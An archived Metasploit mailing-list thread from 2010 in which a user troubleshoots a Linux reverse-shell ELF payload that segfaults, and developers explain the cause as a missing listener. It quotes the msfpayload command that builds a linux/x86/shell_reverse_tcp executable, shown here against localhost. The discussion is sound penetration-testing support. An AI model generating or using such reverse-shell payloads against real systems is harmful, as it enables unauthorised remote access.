Home page logo
/

metasploit logo Metasploit mailing list archives

Re: Linux payloads broken
From: Konrads Smelkovs <konrads () smelkovs com>
Date: Sat, 8 May 2010 15:33:56 +0300

You are right, with listener it works. Don't know what happened to my
strace earlier.

2010/5/7, egypt () metasploit com <egypt () metasploit com>:
The "corrupt" headers are an artifact of how we create ELF
executables.  If you want to see how that works look at
data/templates/src/elf/exe/elf_template.s

When I run an elf generated with the same command you posted under
strace, it clearly calls socket() and connect() before dying.  When a
listener is waiting to accept that connection, it works fine.  The
segfault you're seeing, as Ramon and Florian have pointed out, is due
to a failed connect.

Hope this helped,
egypt

On Fri, May 7, 2010 at 9:00 AM, Konrads Smelkovs <konrads () smelkovs com>
wrote:
Strace shows that it segfaults before any syscalls are placed.
furthermore,
it appears that exec headers are corrupt. wether I have listener or not on
the other end doesn't matter.

--
Konrads Smelkovs
Applied IT sorcery.


On Fri, May 7, 2010 at 3:53 PM, Ramon de Carvalho Valle
<ramon () metasploit com> wrote:

Did you set a listener on the selected port?

-Ramon


On 05/07/2010 05:21 AM, Konrads Smelkovs wrote:
konrads () konrads-laptop:~/msf2$ ./msfpayload linux/x86/shell_reverse_tcp
LHOST=127.0.0.1 LPORT=80 X >out.elf
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
 Length: 71
Options: LHOST=127.0.0.1,LPORT=80
konrads () konrads-laptop:~/msf2$ file out.elf
out.elf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
statically linked, *corrupted section header size*
konrads () konrads-laptop:~/msf2$ chmod +x out.elf
konrads () konrads-laptop:~/msf2$ ./out.elf
*Segmentation fault*
konrads () konrads-laptop:~/msf2$ uname -a
Linux konrads-laptop 2.6.31-20-generic #58-Ubuntu SMP Fri Mar 12
05:23:09
UTC 2010 i686 GNU/Linux


Same for metsvc_reverse_tcp payload
--
Konrads Smelkovs
Applied IT sorcery.




_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


-- 
Nosūtīts no manas mobilās ierīces

--
Konrads Smelkovs
Applied IT sorcery.
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault